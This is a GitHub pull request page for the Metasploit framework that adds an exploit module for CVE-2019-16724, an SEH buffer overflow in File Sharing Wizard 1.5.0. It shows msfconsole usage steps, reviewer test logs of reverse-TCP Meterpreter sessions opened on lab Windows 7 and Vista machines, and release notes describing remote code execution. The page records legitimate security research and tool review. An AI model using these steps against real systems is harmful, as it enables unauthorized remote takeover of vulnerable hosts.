Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

File sharing wizard seh module CVE 2019-16724 #12400

Merged
merged 14 commits into from
Oct 8, 2019
Merged

File sharing wizard seh module CVE 2019-16724 #12400

merged 14 commits into from
Oct 8, 2019

Conversation

dwelch-r7
Copy link
Contributor

@dwelch-r7 dwelch-r7 commented Oct 4, 2019
edited by busterb
Loading

Adds a new module for exploiting CVE 2019-16724 in File Sharing wizard version 1.5.0

Tested against windows 7 32 bit SP1

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Run the exploit:
use exploit/windows/http/file_sharing_wizard_seh
set RHOST 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD windows/x64/exec
set CMD calc.exe
run
  • Verify calc pops up

bcoles
bcoles reviewed Oct 5, 2019
View reviewed changes
modules/exploits/windows/http/file_sharing_wizard_seh.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/file_sharing_wizard_seh.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/file_sharing_wizard_seh.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/file_sharing_wizard_seh.rb Show resolved Hide resolved
modules/exploits/windows/http/file_sharing_wizard_seh.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/file_sharing_wizard_seh.rb Show resolved Hide resolved
modules/exploits/windows/http/file_sharing_wizard_seh.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/file_sharing_wizard_seh.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/file_sharing_wizard_seh.rb Outdated Show resolved Hide resolved
@bcoles
Copy link
Contributor

bcoles commented Oct 5, 2019

Tested on Win 7 Ultimate SP1 (x86) - (with a few edits as per above review).

msf5 exploit(windows/http/file_sharing_wizard_seh) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.222:80 - Connecting to target
[*] 172.16.191.222:80 - Sending payload to target
[*] Sending stage (180291 bytes) to 172.16.191.222
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.222:49227) at 2019-10-05 07:31:12 -0400

meterpreter > getuid
Server username: WIN-7-ULTIMATE-\user
meterpreter > sysinfo
Computer        : WIN-7-ULTIMATE-
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

@bcoles
Copy link
Contributor

bcoles commented Oct 5, 2019

Also works on Windows Vista Home Premium (x86).

msf5 exploit(windows/http/file_sharing_wizard_seh) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.223:80 - Connecting to target
[*] 172.16.191.223:80 - Sending payload to target
[*] Sending stage (180291 bytes) to 172.16.191.223
[*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.223:49258) at 2019-10-05 13:13:16 -0400

meterpreter > sysinfo
Computer        : LH-MPPGQR2OWECW
OS              : Windows Vista (6.0 Build 6000).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter >

@dwelch-r7
Address code review comments
b723d02 
Use strings in info hash, port is an integer, remove version number from
name
@dwelch-r7
Use httpclient over tcpclient
02376c8
@dwelch-r7
Update target
4eb068c
@busterb busterb self-assigned this Oct 8, 2019
bcook-r7 pushed a commit that referenced this pull request Oct 8, 2019
@busterb
Land #12400, Add File Sharing Wizard SEH exploit module
5ce3f5d
@bcook-r7 bcook-r7 merged commit 951fd7b into rapid7:master Oct 8, 2019
@busterb
Copy link
Member

busterb commented Oct 8, 2019
edited by tperry-r7
Loading

Release Notes

This adds an exploit module for CVE 2019-16724 in File Sharing wizard version 1.5.0. It allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter.

@dwelch-r7 dwelch-r7 deleted the ms-4659-file-sharing-wizard-module branch October 8, 2019 12:45
msjenkins-r7 pushed a commit that referenced this pull request Oct 8, 2019
@busterb @msjenkins-r7
Land #12400, Add File Sharing Wizard SEH exploit module
a667020
@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 14, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles left review comments

@wvu wvu wvu left review comments

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

@FULLSHADE FULLSHADE FULLSHADE left review comments

Assignees

@busterb busterb

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
8 participants
@dwelch-r7 @bcoles @busterb @wvu @bwatters-r7 @FULLSHADE @bcook-r7 @tperry-r7